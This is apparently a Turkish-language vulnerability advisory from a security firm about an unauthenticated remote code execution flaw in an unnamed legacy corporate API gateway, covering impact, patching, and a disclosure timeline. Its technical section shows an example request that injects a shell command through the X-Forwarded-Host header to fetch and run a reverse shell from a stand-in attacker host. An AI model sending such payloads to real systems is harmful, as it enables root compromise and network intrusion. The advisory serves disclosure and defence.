EresusSecurity
Advisory içeriklerine dön
ERESUS-ADV-2026-001CriticalCVSS: 9.8

Legacy Kurumsal Gateway Üzerinde Kritik RCE Zafiyeti

Yayımlandı: 2026-03-15

ERESUS-ADV-2026-001: Legacy Kurumsal Ağ Geçidinde Kritik Uzaktan Kod Çalıştırma (RCE)

Genel Bakış

Eresus Security araştırmacıları, yakın tarihli bir güvenlik çalışması sırasında yaygın kullanılan ancak legacy mimaride kalan bir kurumsal API gateway üzerinde kimlik doğrulamasız uzaktan kod çalıştırma (RCE) zafiyeti tespit etti. Zafiyet, saldırganın kimlik doğrulama sürecini aşarak alttaki sistemde root yetkileriyle keyfi komut çalıştırmasına izin veriyordu.

Teknik Detaylar

Zafiyet, X-Forwarded-Host parsing bileşeninde input sanitization kontrolünün eksik yapılmasından kaynaklanır. Gateway'in logging servisi, bash'e özel karakterler içeren özel hazırlanmış HTTP header'larını işlerken bu değerleri güvenli şekilde kaçırmadan çalıştırmaktadır.

Saldırgan, aşağıdaki gibi bozuk biçimli bir istek göndererek zafiyeti tetikleyebilir:

GET /api/v1/status HTTP/1.1
Host: target-gateway.local
X-Forwarded-Host: ; bash -c 'curl http://attacker.com/revshell | bash'

Logging daemon yüksek yetkilerle çalıştığı için bu davranış, kimlik doğrulama gerektirmeden root shell elde edilmesine yol açabilir.

Etki

Başarılı istismar, kimlik doğrulaması olmayan bir saldırganın API gateway üzerinde tam kontrol elde etmesine neden olabilir. Bu durum iç kurumsal ağda lateral movement, hassas operasyonel verilerin açığa çıkması ve gateway üzerinden başka sistemlere pivot edilmesi gibi yüksek etkili sonuçlar doğurur.

Çözüm ve Azaltım

Eresus Security bu zafiyeti coordinated disclosure süreciyle üreticiye bildirdi. Üretici daha sonra güvenlik yaması yayımladı. Kullanıcıların şu adımları uygulaması önerilir:

  1. Üreticinin yayımladığı en güncel güvenlik yamasını hemen uygulayın.
  2. Management ve logging interface'lerinin dış erişimini sınırlandırın.
  3. API gateway instance'larından çıkan şüpheli outbound bağlantılar için network egress loglarını izleyin.

Zaman Çizelgesi

  • 2026-02-12: Zafiyet red team çalışması sırasında keşfedildi.
  • 2026-02-15: Üretici coordinated disclosure kapsamında bilgilendirildi.
  • 2026-02-17: Üretici bulguyu doğruladı ve yama üzerinde çalışmaya başladı.
  • 2026-03-01: Yama public olarak yayımlandı.
  • 2026-03-15: Eresus Security bu advisory'yi yayımladı.

İlgili Hizmetler

AI Güvenlik TestiSızma TestiRed Team Operasyonu